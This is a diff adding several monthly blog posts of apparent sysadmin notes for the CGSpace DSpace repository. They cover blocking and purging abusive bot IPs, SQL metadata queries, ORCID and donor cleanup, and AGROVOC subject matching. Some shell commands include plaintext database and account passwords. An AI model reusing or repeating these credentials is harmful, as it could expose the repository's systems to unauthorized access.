$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5841
$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5887
$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5899
...
```
- And we can see a massive spike in sessions in Munin:
![Grafana load](/cgspace-notes/2022/04/jmx_dspace_sessions-day2.png)
- I see the following IPs using that user agent today:
```console
# grep 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
678 54.90.79.112
1797 54.175.8.110
2697 174.129.118.171
2765 52.73.204.196
3072 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6783 3.85.92.145
7763 34.227.10.4
8738 100.24.63.172
8748 34.236.36.176
8787 3.238.116.153
8794 18.232.101.158
8806 44.200.190.111
9021 54.82.125.225
9027 3.239.81.247
```
- I added those IPs to the firewall and then purged their hits from Solr:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 6024 hits from 100.24.63.172 in statistics
Purging 1719 hits from 174.129.118.171 in statistics
Purging 5972 hits from 18.232.101.158 in statistics
Purging 6053 hits from 3.238.116.153 in statistics
Purging 6228 hits from 3.239.81.247 in statistics
Purging 5305 hits from 34.227.10.4 in statistics
Purging 6002 hits from 34.236.36.176 in statistics
Purging 3908 hits from 35.153.131.101 in statistics
Purging 3692 hits from 35.172.193.232 in statistics
Purging 4525 hits from 3.85.92.145 in statistics
Purging 6048 hits from 44.200.190.111 in statistics
Purging 1942 hits from 52.73.204.196 in statistics
Purging 1944 hits from 54.174.240.122 in statistics
Purging 1264 hits from 54.175.8.110 in statistics
Purging 6117 hits from 54.82.125.225 in statistics
Purging 486 hits from 54.90.79.112 in statistics
Total number of bot hits purged: 67229
```
- Then I created a CSV with these IPs and reported them to AbuseIPDB.com:
```console
$ cat /tmp/ips.csv
IP,Categories,ReportDate,Comment
100.24.63.172,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
174.129.118.171,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
18.232.101.158,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.238.116.153,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.239.81.247,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.227.10.4,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.236.36.176,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.153.131.101,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.172.193.232,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.85.92.145,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
44.200.190.111,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
52.73.204.196,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.174.240.122,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.175.8.110,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.82.125.225,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.90.79.112,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
```
- An hour or so later two more IPs on Amazon started making requests with that user agent too:
- 3.82.22.114
- 18.234.122.84
- Load on the server went back up, sigh
- I added those IPs to the firewall drop list and purged their hits from Solr as well:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 2839 hits from 3.82.22.114 in statistics
Purging 592 hits from 18.234.122.84 in statistics
Total number of bot hits purged: 343
```
- Oh god, there are more coming
- 3.81.21.251
- 54.162.92.93
- 54.226.171.89
## 2022-04-28
- Had a meeting with FAO and the team from SEAFDAC, who run many repositories that are integrated with AGROVOC
- Elvi from SEAFDAC has modified the [DSpace-CRIS 6.x VIAF lookup plugin to query AGROVOC](https://github.com/eulereadgbe/DSpace/blob/sair-6.3/dspace-api/src/main/java/org/dspace/content/authority/AgrovocAuthority.java)
- Also, they are doing a nice integration similar to the WorldFish / MELSpace repositories where they store the AGROVOC URIs in DSpace and show the terms with an icon in the UI
- See: https://repository.seafdec.org.ph/handle/10862/6320
<!-- vim: set sw=2 ts=2: -->

256
content/posts/2022-05.md Normal file
View File

@ -0,0 +1,256 @@
---
title: "May, 2022"
date: 2022-05-04T09:13:39+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-05-04
- I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
- 18.207.136.176
- 185.189.36.248
- 50.118.223.78
- 52.70.76.123
- 3.236.10.11
- Looking at the Solr statistics for 2022-04
- 52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
- 64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
- 185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
- 157.55.39.159 is owned by Microsoft and identifies as bingbot so I don't know why its requests were logged in Solr
- 52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
- 157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
- 207.46.13.177 is owned by Microsoft and identifies as bingbot so I don't know why its requests were logged in Solr
- If I query Solr for `time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.` I see a handful of IPs that made 41,000 requests
- I purged 93,974 hits from these IPs using my `check-spider-ip-hits.sh` script
<!--more-->
- Now looking at the Solr statistics by user agent I see:
- `SomeRandomText`
- `RestSharp/106.11.7.0`
- `MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)`
- `wp_is_mobile`
- `Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com; Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"`
- `insomnia/2022.2.1`
- `ZoteroTranslationServer`
- `omgili/0.5 +http://omgili.com`
- `curb`
- `Sprout Social (Link Attachment)`
- I purged 2,900 hits from these user agents from Solr using my `check-spider-hits.sh` script
- I made a [pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/54) for some of these agents
- In the mean time I will add them to our local overrides in DSpace
- Run all system updates on AReS server, update all Docker containers, and restart the server
- Start a harvest on AReS
## 2022-05-05
- Update PostgreSQL JDBC driver to 42.3.5 in the Ansible infrastructure playbooks and deploy on DSpace Test
- Peter asked me how many items we add to CGSpace every year
- I wrote a SQL query to check the number of items grouped by their accession dates since 2009:
```console
localhost/dspacetest= ☘ SELECT EXTRACT(year from text_value::date) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
yyyy │ count
──────┼───────
2022 │ 2073
2021 │ 6471
2020 │ 4074
2019 │ 7330
2018 │ 8899
2017 │ 6860
2016 │ 8451
2015 │ 15692
2014 │ 16479
2013 │ 4388
2012 │ 6472
2011 │ 2694
2010 │ 2457
2009 │ 293
```
- Note that I had an issue with casting `text_value` to date because one item had an accession date of `2016` instead of `2016-09-29T20:14:47Z`
- Once I fixed that PostgreSQL was able to [extract() the year](https://www.postgresql.org/docs/12/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT)
- There were some other methods I tried that worked also, for example `TO_DATE()`:
```console
localhost/dspacetest= ☘ SELECT EXTRACT(year from TO_DATE(text_value, 'YYYY-MM-DD"T"HH24:MI:SS"Z"')) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
```
- But it seems PostgreSQL is smart enough to recognize date formatting in strings automatically when we cast so we don't need to convert to date first
- Another thing I noticed is that a few hundred items have accession dates from decades ago, perhaps this is due to importing items from the CGIAR Library?
- I spent some time merging a few pull requests for DSpace 6.4 and porting one to `main` for DSpace 7.x
- I also submitted a [pull request to migrate Mirage 2's build from bower and compass to yarn and node-sass](https://github.com/DSpace/DSpace/pull/8288)
## 2022-05-07
- Start a harvest on AReS
## 2022-05-09
- Submit an issue to Atmire's bug tracker inquiring about DSpace 6.4 support
## 2022-05-10
- Submit an updated [pull request to migrate Mirage 2's build from bower and compass to npm and node-sass](https://github.com/DSpace/DSpace/pull/8292)
- This one is better than the previous one because it uses npm directly, which comes with the Node.js distribution, rather than requiring the user to install yarn
- I also updated a bunch of grunt build deps
## 2022-05-12
- CGSpace meeting with Abenet and Peter
- We discussed the future of CGSpace and DSpace in general in the new One CGIAR
- We discussed how to prepare for bringing in content from the Initiatives, whether we need new metadata fields to support people from IFPRI etc
- We discussed the need for good quality Drupal and WordPress modules so sites can harvest content from the repository
- Peter asked me to send him a list of investors/funders/donors so he can clean it up, but also to try to align it with ROR and evntually do something like we do with country codes, adding the ROR IDs and potentially showing the badge on item views
- We also discussed removing some Mirage 2 themes for old programs and CRPs that don't have custom branding, ie only Google Analytics
- Export a list of donors for Peter to clean up:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-05-12-donors.csv WITH CSV HEADER;
COPY 1184
```
- Then I created a CSV from our `cg-creator-identifier.xml` controlled vocabulary and ran it against our database with `add-orcid-identifiers-csv.py` to see if any author names by chance matched that are missing ORCIDs in CGSpace
```console
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-05-12-add-orcids.csv -db dspace -u dspace -p 'fuuu' | tee /tmp/orcid.log
$ grep -c "Adding ORCID" /tmp/add-orcids.log
85
```
- So it's only eighty-five, but better than nothing...
- I removed the custom Mirage 2 themes for some old projects:
- AgriFood
- AVCD
- LIVES
- FeedTheFuture
- DrylandSystems
- TechnicalConsortium
- EADD
- That should knock off a few minutes of the maven build time!
- I generated a report from the AReS nginx logs on linode18:
```console
# zcat --force /var/log/nginx/access.log.* | grep 'GET /explorer' | goaccess --log-format=COMBINED - -o /tmp/ares_report.html
```
## 2022-05-13
- Peter finalized the corrections on donors from yesterday so I extracted them into fix/delete CSVs and ran them on CGSpace:
```console
$ ./ilri/fix-metadata-values.py -i 2022-05-13-fix-CGSpace-Donors.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.donor -m 248 -t correct -d
$ ./ilri/delete-metadata-values.py -i 2022-05-13-delete-CGSpace-Donors.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.donor -m 248 -d
```
- I cleaned up a few records manually (like some that had \r\n) then re-exported the donors and checked against the latest ROR dump:
```console
$ ./ilri/ror-lookup.py -i /tmp/2022-05-13-donors.csv -r v1.0-2022-03-17-ror-data.json -o /tmp/2022-05-13-ror.csv
$ csvgrep -c matched -m true /tmp/2022-05-13-ror.csv | wc -l
230
$ csvgrep -c matched -m false /tmp/2022-05-13-ror.csv | csvcut -c organization > /tmp/2022-05-13-ror-unmatched.csv
```
- Then I sent Peter a list so he can try to update some from ROR
- I did some work to upgrade the Mirage 2 build dependencies in our `6_x-prod` branch
- I switched to Node.js 14 also
- Meeting with Margarita and Manuel from ABC to discuss uploading ~6,000 automatically-generated CRP policy reports from MARLO to CGSpace
- They will try to provide the records and PDFs by mid June because they are still finalizing the reports for 2021
- MARLO will be going offline because it was for the CRPs
- We reviewed the metadata they have and gave them some advice on the formatting
- Once we upload the records I will need to provide them with a mapping of the MARLO URLs to Handle URLs so they can set up redirects
## 2022-05-14
- Start a full Discovery index
- Start an AReS harvest
## 2022-05-23
- Start an AReS harvest
## 2022-05-24
- Update CGSpace to latest `6_x-prod` branch, which removes a handful of Mirage 2 themes and migrates to Node.js 14 and some newer build deps
- Run all system updates on CGSpace (linode18) and reboot it
## 2022-05-25
- Maria Garruccio sent me a handful of new ORCID identifiers for Alliance staff
- We currently have 1349 unique identifiers and this adds about forty-five new ones (!):
```console
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | sort | uniq | wc -l
1349
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new-abc-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2022-05-25-combined-orcids.txt
$ wc -l /tmp/2022-05-25-combined-orcids.txt
1395 /tmp/2022-05-25-combined-orcids.txt
```
- After combining and filtering them I resolved their names using my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2022-05-25-combined-orcids.txt -o /tmp/2022-05-25-combined-orcids-names.txt
```
- There are some names that changed, so I need to run them through the `fix-metadata-values.py` script:
```console
$ cat 2022-05-25-update-orcids.csv
cg.creator.identifier,correct
"Andrea Fongar: 0000-0003-2084-1571","ANDREA CECILIA SANCHEZ BOGADO: 0000-0003-4549-6970"
"Bekele Shiferaw: 0000-0002-3645-320X","Bekele A. Shiferaw: 0000-0002-3645-320X"
"Henry Kpaka: 0000-0002-7480-2933","Henry Musa Kpaka: 0000-0002-7480-2933"
"Josephine Agogbua: 0000-0001-6317-1227","Josephine Udunma Agogbua: 0000-0001-6317-1227"
"Martha Lilia Del Río Duque: 0000-0002-0879-0292","Martha Del Río: 0000-0002-0879-0292"
$ ./ilri/fix-metadata-values.py -i 2022-05-25-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -m 247 -t correct -d -n
Connected to database.
Would fix 4 occurences of: Andrea Fongar: 0000-0003-2084-1571
Would fix 1 occurences of: Bekele Shiferaw: 0000-0002-3645-320X
Would fix 2 occurences of: Josephine Agogbua: 0000-0001-6317-1227
Would fix 34 occurences of: Martha Lilia Del Río Duque: 0000-0002-0879-0292
```
## 2022-05-26
- I extracted the names and ORCID identifiers from Maria's spreadsheet and produced several CSV files with different name formats:
- First Last (GREL: `cells['First Name'].value + ' ' + cells['Surname'].value`)
- Last, First (GREL: `cells['Surname'].value + ", " + cells['First Name'].value`)
- Last, F. (GREL: `cells['Surname'].value + ", " + cells['First Name'].value.substring(0, 1) + "."`)
- Then I constructed a CSV for each of these variations to use with `add-orcid-identifiers-csv.py`
- In total I matched a bunch of authors and added 872 new metadata fields!
## 2022-05-27
- Send a follow up to Leroy from the Alliance to ask about the CIAT Library URLs
- It seems that I forgot to attach the list of PDFs when I last communicated with him in 2022-03
- Meeting with Terry Bucknell from Overton.io
## 2022-05-28
- Start a harvest on AReS
## 2022-05-30
- Help IITA with some collection authorization issues on CGSpace
- Finally looking into Peter's Altmetric export from 2022-02
- We want to try to compare some of the information about open access status with that in CGSpace
- I created a new column for all items that have CGSpace handles using this GREL:
```console
"https://hdl.handle.net/" + value.match(/.*?(10568\/\d+).*?/)[0]
```
- With that I can do a join on the CGSpace metadata and perhaps clean up some items
```console
$ ./bin/dspace metadata-export -f 2022-05-30-cgspace.csv
$ csvcut -c 'id,dc.identifier.uri[en_US],dcterms.accessRights[en_US],dcterms.license[en_US]' 2022-05-30-cgspace.csv | sed '1 s/dc\.identifier\.uri\[en_US\]/dc.identifier.uri/' > /tmp/cgspace.csv
$ csvjoin -c 'dc.identifier.uri' ~/Downloads/2022-05-30-Altmetric-Research-Outputs-CGSpace.csv /tmp/cgspace.csv > /tmp/cgspace-altmetric.csv
```
- Examining the data in OpenRefine I spot checked a few records where Altmetric and CGSpace disagree and in most cases I found Altmetric to be wrong...
<!-- vim: set sw=2 ts=2: -->

290
content/posts/2022-06.md Normal file
View File

@ -0,0 +1,290 @@
---
title: "June, 2022"
date: 2022-06-06T09:01:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-06-06
- Look at the Solr statistics on CGSpace
- I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS "msnbot-" using the Solr query `dns:*msnbot* AND dns:*.msn.com`
- I purged these first so I could see the other "real" IPs in the Solr facets
- I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
- I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
- I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
- There seem to be many more of these:
<!--more-->
```console
# zcat --force /var/log/nginx/access.log* | grep 208.185.238. | awk '{print $1}' | sort | uniq -c | sort -h
2 208.185.238.1
166 208.185.238.54
1293 208.185.238.51
2587 208.185.238.59
4692 208.185.238.56
5480 208.185.238.53
6277 208.185.238.52
6400 208.185.238.58
8261 208.185.238.55
17549 208.185.238.57
```
- I see 3,000 hits from 178.208.75.33 by a Russian-owned IP in the Netherlands that is making a GET to / every one minute, using a normal user agent
- I see 3,000 hits from 134.122.124.196 on Digital Ocean to the REST API with a normal user agent
- I purged all these hits from IPs for a total of about 265,000
- Then I faceted by user agent and found
- 1,000 hits by `insomnia/2022.2.1`, which I also saw last month and submitted to COUNTER-Robots
- 265 hits by `omgili/0.5 +http://omgili.com`
- 150 hits by `Vizzit`
- 132 hits by `MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)`
- 73 hits by `Scoop.it`
- 62 hits by `bitdiscovery`
- 59 hits by `Asana/1.4.0 WebsiteMetadataRetriever`
- 32 hits by `Sprout Social (Link Attachment)`
- 29 hits by `CyotekWebCopy/1.9 CyotekHTTP/6.2`
- 20 hits by `Hootsuite-Authoring/1.0`
- I purged about 4,100 hits from these user agents
- Run all system updates on AReS server (linode20) and reboot
- I want to try to update some of the build dependencies of OpenRXV since Node.js 12 is no longer supported
- Upgrade linode20 to Ubuntu 22.04 and start an AReS harvest
- I merged the [Mirage 2 build fix](https://github.com/DSpace/DSpace/pull/8292) to `dspace-6_x` for DSpace 6.4
## 2022-06-07
- I tested Node.js 14 one more time with vanilla DSpace 6.4-SNAPSHOT and with the CGSpace source and it worked well
- I made [a pull request](https://github.com/DSpace/DSpace/pull/8331) to DSpace to use Node.js 14 for Mirage 2
- I even tested Node.js 16 and it works, but that is enough for now...
## 2022-06-08
- Work on AReS a bit since I wasn't able to harvest after doing the updates on the server and in the containers a few days ago
- I don't know what the problem was really, but on the server I had to enable IPv4 forwarding so the frontend container would build
- Once I downed and upped AReS with docker-compose I was able to start a new harvest
- I also did some tests to enable ES2020 target in the backend because we're on Node.js 14 there now
## 2022-06-13
- Create a user for Mohammed Salem to test MEL submission on DSpace Test:
```console
$ dspace user -a -m mel-submit@cgiar.org -g MEL -s Submit -p 'owwwwwwww'
```
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
## 2022-06-14
- Start a harvest on AReS
## 2022-06-16
- Francesca asked us to add the CC-BY-3.0-IGO license to the submission form on CGSpace
- I remember I [had requested SPDX to add CC-BY-NC-ND-3.0-IGO](https://github.com/spdx/license-list-XML/issues/767) in 2019-02, and they finally [merged it](https://github.com/spdx/license-list-XML/pull/1068) in 2020-07, but I never added it to CGSpace
- I will add the full suite of CC 3.0 IGO licenses to CGSpace and then make a request to SPDX for the others:
- CC-BY-3.0-IGO
- CC-BY-SA-3.0-IGO
- CC-BY-ND-3.0-IGO
- CC-BY-NC-3.0-IGO
- CC-BY-NC-SA-3.0-IGO
- CC-BY-NC-ND-3.0-IGO
- I filed [an issue asking for SPDX to add CC-BY-3.0-IGO](https://github.com/spdx/license-list-XML/issues/1525)
- Meeting with Moayad from CodeObia to discuss OpenRXV
- He added the ability to use multiple indexes / dashboards, and to be able to embed them in iframes
- Add `cg.contributor.initiative` with a controlled vocabulary based on CLARISA's list to the CGSpace submission form
- Switch to the `linux-virtual-hwe-20.04` kernel on CGSpace (linode18), run all system updates, and reboot
## 2022-06-17
- I noticed a few ORCID identifiers missing for some scientists so I added them to the controlled vocabulary and then tagged them on CGSpace:
```console
$ cat 2022-06-17-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Tijjani, A.","Abdulfatai Tijjani: 0000-0002-0793-9059"
"Tijjani, Abdulfatai","Abdulfatai Tijjani: 0000-0002-0793-9059"
"Mrode, Raphael A.","Raphael Mrode: 0000-0003-1964-5653"
"Okeyo Mwai, Ally","Ally Okeyo Mwai: 0000-0003-2379-7801"
"Ojango, Julie M.K.","Ojango J.M.K.: 0000-0003-0224-5370"
"Prendergast, J.G.D.","James Prendergast: 0000-0001-8916-018X"
"Ekine-Dzivenu, Chinyere","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
"Ekine, C.","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
"Ekine-Dzivenu, C.C","Chinyere Ekine-Dzivenu: 0000-0002-8526-435X"
"Shilomboleni, Helena","Helena Shilomboleni: 0000-0002-9875-6484"
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-06-17-add-orcids.csv -db dspace -u dspace -p 'fuuu' | tee /tmp/orcids.log
$ grep -c 'Adding ORCID' /tmp/orcids2.log
304
```
- Also make some changes to the Discovery facets and item view
- I reduced the number of items to show for CRP facets from 20 to 5
- I added a facet for the Initiatives
- I re-organized a few parts of the item view to add Action Areas and the list of author affiliations
## 2022-06-18
- I deployed the changes on CGSpace and started a full Discovery index for the new Initiatives facet
- Run `dspace cleanup -v` on CGSpace
## 2022-06-20
- Add missing ORCID identifier for ILRI staff to CGSpace and tag their items
## 2022-06-21
- Work on OpenRXV backend dependencies
- Update Elasticsearch and TypeScript and eslint
- Sit in on webinar about contributing terms to AGROVOC
- I agreed that I would send Sara Jani from ICARDA a list of new terms we have that don't match AGROVOC by end of June
- I need to indicate which center is using them so we can have an appropriate expert review the terms
## 2022-06-22
- I re-deployed AReS with the latest OpenRXV changes then started a fresh harvest
- Meeting with Salem to discuss metadata between CGSpace and MEL
- We started working through his spreadsheet and then the Internet dropped
## 2022-06-23
- Start looking at country names between MEL, CGSpace, and standards like UN M.49 and GeoNames
- I used `xmllint` to extract the countries from CGSpace's input forms:
```console
$ xmllint --xpath '//value-pairs[@value-pairs-name="countrylist"]/pair/stored-value/node()' dspace/config/input-forms.xml > /tmp/cgspace-countries.txt
```
- Then I wrote a Python script (`countries-to-csv.py`) to read them and save their names alongside the ISO 3166-1 Alpha2 code
- Then I joined them with the other lists:
```console
$ csvjoin --outer -c alpha2 ~/Downloads/clarisa-countries.csv ~/Downloads/UNSD\ \ Methodology.csv ~/Downloads/geonames-countries.csv /tmp/cgspace-countries.csv /tmp/mel-countries.csv> /tmp/countries.csv
```
- This mostly worked fine, and is much easier than writing another Python script with Pandas...
## 2022-06-24
- Spent some more time working on my `countries-to-csv.py` script to fix some logic errors
- Then re-export the UN M.49 countries to a clean list because the one I did yesterday somehow has errors:
```console
$ csvcut -d ';' -c 'ISO-alpha2 Code,Country or Area' ~/Downloads/UNSD\ \ Methodology.csv | sed -e '1s/ISO-alpha2 Code/alpha2/' -e '1s/Country or Area/UN M.49 Name/' > ~/Downloads/un-countries.csv
```
- Check the number of lines in each file:
```
$ wc -l clarisa-countries.csv un-countries.csv cgspace-countries.csv mel-countries.csv
250 clarisa-countries.csv
250 un-countries.csv
198 cgspace-countries.csv
258 mel-countries.csv
```
- I am seeing strange results with csvjoin's `--outer` join that I need to keep unmatched terms from both left and right files...
- Using `xsv join --full` is giving me better results:
```
$ xsv join --full alpha2 ~/Downloads/clarisa-countries.csv alpha2 ~/Downloads/un-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-xsv-full.csv
```
- Then adding the CGSpace and MEL countries:
```console
$ xsv join --full alpha2 /tmp/clarisa-un-xsv-full.csv alpha2 /tmp/cgspace-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-cgspace-xsv-full.csv
$ xsv join --full alpha2 /tmp/clarisa-un-cgspace-xsv-full.csv alpha2 /tmp/mel-countries.csv | xsv select '!alpha2[1]' > /tmp/clarisa-un-cgspace-mel-xsv-full.csv
```
## 2022-06-26
- Start a harvest on AReS
## 2022-06-28
- Start working on the CGSpace subject export for FAO / AGROVOC
- First I exported a list of all metadata in our `dcterms.subject` and other center-specific subject fields with their counts:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2022-06-28-cgspace-subjects.csv WITH CSV HEADER;
COPY 27010
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2022-06-28-cgspace-subjects.csv | sed '1d' > /tmp/2022-06-28-cgspace-subjects.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/2022-06-28-cgspace-subjects.txt -o /tmp/2022-06-28-cgspace-subjects-results.csv
```
- I keep getting timeouts after every five or ten requests, so this will not be feasible for 27,000 subjects!
- I think I will have to write some custom script to use the AGROVOC RDF file
- Using rdflib to open the 1.2GB `agrovoc_lod.rdf` file takes several minutes and doesn't seem very efficient
- I tried using [lightrdf](https://github.com/ozekik/lightrdf) and it's much quicker, but the documentation is limited and I'm not sure how to search yet
- I had to try in different Python versions because 3.10.x is apparently too new
- For future reference I was able to search with lightrdf:
```python
import lightrdf
parser = lightrdf.Parser()
# prints millions of lines
for triple in parser.parse("./agrovoc_lod.rdf", base_iri=None):
print(triple)
agrovoc = lightrdf.RDFDocument('agrovoc_lod.rdf');
# all results for prefix http://aims.fao.org/aos/agrovoc/c_5
for triple in agrovoc.search_triples('http://aims.fao.org/aos/agrovoc/c_5', None, None):
print(triple)
('http://aims.fao.org/aos/agrovoc/c_5', 'http://www.w3.org/2004/02/skos/core#altLabel', '"Abalone"@de')
('http://aims.fao.org/aos/agrovoc/c_5', 'http://www.w3.org/2004/02/skos/core#prefLabel', '"abalones"@en')
# all stuff for abalones in English
for triple in agrovoc.search_triples(None, None, '"abalones"@en'):
print(triple)
```
- I ran the `agrovoc-lookup.py` from a Linode server and it completed without issues... hmmm
## 2022-06-29
- Continue working on the list of non-AGROVOC subject to report to FAO
- I got a one liner to get the list of non-AGROVOC subjects and join them with their counts (updated to use regex in csvgrep):
```console
$ csvgrep -c 'number of matches' -r '^0$' /tmp/2022-06-28-cgspace-subjects-results.csv \
| csvcut -c subject \
| csvjoin -c subject /tmp/2022-06-28-cgspace-subjects.csv - \
> /tmp/2022-06-28-cgspace-non-agrovoc.csv
```
## 2022-06-30
- Check some AfricaRice records for potential duplicates on CGSpace for Abenet:
```console
$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/Africarice_2ndBatch_ay.csv | sed '1s/line_number/id/' > /tmp/africarice.csv
$ csv-metadata-quality -i /tmp/africarice.csv -o /tmp/africarice-cleaned.csv -u
$ ./ilri/check-duplicates.py -i /tmp/africarice-cleaned.csv -u dspacetest -db dspacetest -p 'dom@in34sniper' -o /tmp/africarice-duplicates.csv
```
- Looking at the non-AGROVOC subjects again, I see some in our list that are duplicated in uppercase and lowercase, so I will run it again with all lowercase:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2022-06-30-cgspace-subjects.csv WITH CSV HEADER;
```
- Also, I see there might be something wrong with my csvjoin because nigeria shows up in the final list as having not matched...
- Ah, I was using `csvgrep -m 0` to find rows that didn't match, but that also matched items that had 10, 100, 50, etc...
- We need to use a regex:
```console
$ csvgrep -c 'number of matches' -r '^0$' /tmp/2022-06-30-cgspace-subjects-results.csv \
| csvcut -c subject \
| csvjoin -c subject /tmp/2022-06-30-cgspace-subjects.csv - \
> /tmp/2022-06-30-cgspace-non-agrovoc.csv
```
- Then I took all the terms with fifty or more occurences and put them on a Google Sheet
- There I started removing any term that was a variation of an existing AGROVOC term (like cowpea/cowpeas, policy/policies) or a compound concept
- pnbecker on DSpace Slack mentioned that they made a JSPUI deduplication step that is open source: https://github.com/the-library-code/deduplication
- It uses Levenshtein distance via PostgreSQL's fuzzystrmatch extension
<!-- vim: set sw=2 ts=2: -->

510
content/posts/2022-07.md Normal file
View File

@ -0,0 +1,510 @@
---
title: "July, 2022"
date: 2022-07-02T14:07:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-07-02
- I learned how to use the Levenshtein functions in PostgreSQL
- The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
- Also, the trgm functions I've used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first
<!--more-->
- A working query checking for duplicates in the recent AfricaRice items is:
```console
localhost/dspace= ☘ SELECT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND levenshtein_less_equal(LOWER('International Trade and Exotic Pests: The Risks for Biodiversity and African Economies'), LEFT(LOWER(text_value), 255), 3) <= 3;
text_value
────────────────────────────────────────────────────────────────────────────────────────
International trade and exotic pests: the risks for biodiversity and African economies
(1 row)
Time: 399.751 ms
```
- There is a great [blog post discussing Soundex with Levenshtein](https://www.crunchydata.com/blog/fuzzy-name-matching-in-postgresql) and creating indexes to make them faster
- I want to do some proper checks of accuracy and speed against my trigram method
## 2022-07-03
- Start a harvest on AReS
## 2022-07-04
